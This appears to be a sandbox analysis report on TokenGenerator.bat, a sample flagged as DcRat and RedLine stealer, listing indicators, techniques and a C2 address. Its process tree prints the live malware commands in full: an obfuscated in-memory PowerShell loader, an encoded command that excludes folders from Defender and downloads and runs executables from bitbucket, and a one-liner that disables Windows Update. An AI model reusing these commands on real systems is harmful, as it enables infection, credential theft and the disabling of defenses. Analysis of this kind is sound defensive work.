dcrat | 97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b

Resubmissions

29-08-2022 03:50

220829-ed6vwacdc8 10

29-08-2022 03:47

220829-ecjc7acda5 10

Analysis

max time kernel
26s
max time network
48s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2022 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TokenGenerator.bat
Size

24KB
MD5

e85403a4491b4ed319390201a735de7d
SHA1

bf93b11ce5d33046c8a110bff05d4c0e6b1d90a2
SHA256

97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b
SHA512

d73ede4bae6b6cab73f46e7d7dda812fc1317ba6e1d0efff5d1ebca3015395b6ffa8c385b2005ec23603c835b478ea77c1ceba3ea12232e614604155e48e5859
SSDEEP

384:I55wqklVZlT/pHazFwZWvjKlFYatnvaY5o9GFIxqvFOcueWrC9:GY7azFwZSjKltvh5og6tcN8C9

Score

10^/10

dcrat redline dv discovery evasion exploit infostealer rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 39 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4268	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1544	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4568	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3964	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3656	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4712	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1508	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2096	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4260	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1252	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4560	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2988	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4524	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3956	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4748	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4600	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	892	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	892	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
behavioral3/memory/1128-158-0x0000000000C10000-0x0000000000C2E000-memory.dmp	family_redline

DCRat payload 23 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
behavioral3/memory/4924-178-0x0000000000790000-0x0000000000A42000-memory.dmp	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\comsavesbroker\powershell.exe	dcrat
C:\odt\WmiPrvSE.exe	dcrat
C:\odt\WmiPrvSE.exe	dcrat
behavioral3/memory/4300-271-0x0000000000BA0000-0x0000000000E52000-memory.dmp	dcrat
C:\comsavesbroker\powershell.exe	dcrat
behavioral3/memory/3948-231-0x0000000000DE0000-0x0000000001092000-memory.dmp	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

23 1856 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

TokenGenerator.bat.exe1.exe2.exe3.execontainersavesdhcp.exe

pid process

2360 TokenGenerator.bat.exe
1128 1.exe
876 2.exe
4328 3.exe
4924 containersavesdhcp.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4636 takeown.exe
2312 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
23	1856	powershell.exe

pid	process
4636	takeown.exe
2312	icacls.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TokenGenerator.bat.exe2.exe3.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	TokenGenerator.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4636 takeown.exe
2312 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
4636	takeown.exe
2312	icacls.exe

Drops file in Program Files directory 9 IoCs

Processes:

containersavesdhcp.exe

description	ioc	process
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\System.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\27d1bcfc3c54e0	containersavesdhcp.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\StartMenuExperienceHost.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SppExtComObj.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\e1ef82546f0b02	containersavesdhcp.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe	containersavesdhcp.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382	containersavesdhcp.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\55b276f4edf653	containersavesdhcp.exe

Drops file in Windows directory 1 IoCs

Processes:

containersavesdhcp.exe

description ioc process

File created C:\Windows\schemas\EAPMethods\cmd.exe containersavesdhcp.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1148 sc.exe
3060 sc.exe
2160 sc.exe
4560 sc.exe
1764 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\schemas\EAPMethods\cmd.exe	containersavesdhcp.exe

pid	process
1148	sc.exe
3060	sc.exe
2160	sc.exe
4560	sc.exe
1764	sc.exe

Creates scheduled task(s) 1 TTPs 39 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4748	schtasks.exe
2880	schtasks.exe
228	schtasks.exe
1492	schtasks.exe
1468	schtasks.exe
1252	schtasks.exe
4600	schtasks.exe
4604	schtasks.exe
4568	schtasks.exe
2368	schtasks.exe
1668	schtasks.exe
1508	schtasks.exe
740	schtasks.exe
4560	schtasks.exe
3956	schtasks.exe
1576	schtasks.exe
4004	schtasks.exe
4712	schtasks.exe
4872	schtasks.exe
4524	schtasks.exe
4088	schtasks.exe
3964	schtasks.exe
2096	schtasks.exe
3016	schtasks.exe
4700	schtasks.exe
3656	schtasks.exe
1984	schtasks.exe
2988	schtasks.exe
1960	schtasks.exe
2720	schtasks.exe
4268	schtasks.exe
1544	schtasks.exe
3060	schtasks.exe
4300	schtasks.exe
4260	schtasks.exe
4432	schtasks.exe
1132	schtasks.exe
2644	schtasks.exe
1256	schtasks.exe

Modifies registry class 1 IoCs

Processes:

3.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000_Classes\Local Settings 3.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3172 reg.exe
4872 reg.exe
2880 reg.exe
4804 reg.exe
3332 reg.exe
4436 reg.exe
4808 reg.exe
3548 reg.exe
3916 reg.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000_Classes\Local Settings	3.exe

pid	process
3172	reg.exe
4872	reg.exe
2880	reg.exe
4804	reg.exe
3332	reg.exe
4436	reg.exe
4808	reg.exe
3548	reg.exe
3916	reg.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exe1.execontainersavesdhcp.exe

pid	process
2360	TokenGenerator.bat.exe
2360	TokenGenerator.bat.exe
1856	powershell.exe
1856	powershell.exe
504	powershell.exe
504	powershell.exe
2464	powershell.exe
2464	powershell.exe
1128	1.exe
1128	1.exe
4924	containersavesdhcp.exe
4924	containersavesdhcp.exe
4924	containersavesdhcp.exe
4924	containersavesdhcp.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exe1.execontainersavesdhcp.exe

description	pid	process
Token: SeDebugPrivilege	2360	TokenGenerator.bat.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	504	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	1128	1.exe
Token: SeDebugPrivilege	4924	containersavesdhcp.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

cmd.exenet.exeTokenGenerator.bat.execmd.exepowershell.exe2.exe3.exeWScript.execmd.exe

description	pid	process	target process
PID 2236 wrote to memory of 1708	2236	cmd.exe	net.exe
PID 2236 wrote to memory of 1708	2236	cmd.exe	net.exe
PID 1708 wrote to memory of 2388	1708	net.exe	net1.exe
PID 1708 wrote to memory of 2388	1708	net.exe	net1.exe
PID 2236 wrote to memory of 2360	2236	cmd.exe	TokenGenerator.bat.exe
PID 2236 wrote to memory of 2360	2236	cmd.exe	TokenGenerator.bat.exe
PID 2360 wrote to memory of 1856	2360	TokenGenerator.bat.exe	powershell.exe
PID 2360 wrote to memory of 1856	2360	TokenGenerator.bat.exe	powershell.exe
PID 2360 wrote to memory of 3180	2360	TokenGenerator.bat.exe	cmd.exe
PID 2360 wrote to memory of 3180	2360	TokenGenerator.bat.exe	cmd.exe
PID 3180 wrote to memory of 212	3180	cmd.exe	choice.exe
PID 3180 wrote to memory of 212	3180	cmd.exe	choice.exe
PID 1856 wrote to memory of 504	1856	powershell.exe	powershell.exe
PID 1856 wrote to memory of 504	1856	powershell.exe	powershell.exe
PID 3180 wrote to memory of 2152	3180	cmd.exe	attrib.exe
PID 3180 wrote to memory of 2152	3180	cmd.exe	attrib.exe
PID 1856 wrote to memory of 1128	1856	powershell.exe	1.exe
PID 1856 wrote to memory of 1128	1856	powershell.exe	1.exe
PID 1856 wrote to memory of 1128	1856	powershell.exe	1.exe
PID 1856 wrote to memory of 876	1856	powershell.exe	2.exe
PID 1856 wrote to memory of 876	1856	powershell.exe	2.exe
PID 1856 wrote to memory of 4328	1856	powershell.exe	3.exe
PID 1856 wrote to memory of 4328	1856	powershell.exe	3.exe
PID 1856 wrote to memory of 4328	1856	powershell.exe	3.exe
PID 876 wrote to memory of 2464	876	2.exe	powershell.exe
PID 876 wrote to memory of 2464	876	2.exe	powershell.exe
PID 4328 wrote to memory of 4508	4328	3.exe	WScript.exe
PID 4328 wrote to memory of 4508	4328	3.exe	WScript.exe
PID 4328 wrote to memory of 4508	4328	3.exe	WScript.exe
PID 4508 wrote to memory of 1608	4508	WScript.exe	cmd.exe
PID 4508 wrote to memory of 1608	4508	WScript.exe	cmd.exe
PID 4508 wrote to memory of 1608	4508	WScript.exe	cmd.exe
PID 1608 wrote to memory of 4924	1608	cmd.exe	containersavesdhcp.exe
PID 1608 wrote to memory of 4924	1608	cmd.exe	containersavesdhcp.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2152 attrib.exe

pid	process
2152	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe
"TokenGenerator.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $yNMNp = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat').Split([Environment]::NewLine);foreach ($DUpwR in $yNMNp) { if ($DUpwR.StartsWith(':: ')) { $zpFYG = $DUpwR.Substring(3); break; }; };$NDpIw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zpFYG);$FglUn = New-Object System.Security.Cryptography.AesManaged;$FglUn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$FglUn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$FglUn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xe8pXJdA3AONCe1Zlyq3gqv0U2vVZ+ZFx6YQNe5/72I=');$FglUn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6rOZj0Gc5fVio24RyZePg==');$tMNPD = $FglUn.CreateDecryptor();$NDpIw = $tMNPD.TransformFinalBlock($NDpIw, 0, $NDpIw.Length);$tMNPD.Dispose();$FglUn.Dispose();$duObo = New-Object System.IO.MemoryStream(, $NDpIw);$yiuvK = New-Object System.IO.MemoryStream;$VgABR = New-Object System.IO.Compression.GZipStream($duObo, [IO.Compression.CompressionMode]::Decompress);$VgABR.CopyTo($yiuvK);$VgABR.Dispose();$duObo.Dispose();$yiuvK.Dispose();$NDpIw = $yiuvK.ToArray();$DvMBT = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($NDpIw);$pFgMM = $DvMBT.EntryPoint;$pFgMM.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHAAcQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAHMAIAAvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGYAegBpACMAPgA7ACIAOwA8ACMAcgBuAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGoAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHAAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAHgAYwAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AZABlAHYALgBlAHgAZQAnACwAIAA8ACMAZgBzAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAG0AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApACkAPAAjAHgAawBmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADEANwAxADcALwBnAHIAZwBlAHIAZQByAGcAcgBlAGcAZwAvAHIAYQB3AC8ANwA0AGUAYgAwADMAZgA3AGMAOAA0ADgAMwA1AGMAMgBlADEAMgA1ADYAYgA0AGIANwA4ADIAOAA1ADgANwBjAGIANgA4ADcANQA2ADgANQAvAGgAYQBmAHUAawAuAGUAeABlACcALAAgADwAIwB5AGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAYQBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAcQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAYwBtAHEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AbgBvAGIAbwB5AC4AZQB4AGUAJwAsACAAPAAjAG4AZABrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB4AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwBqAGwAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAeAB0AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGoAdQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB6AHQAeAAjAD4A"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#pqn#>[System.Windows.Forms.MessageBox]::Show('No VMs / VPS allowed!','','OK','Error')<#fzi#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:504

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:3828

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
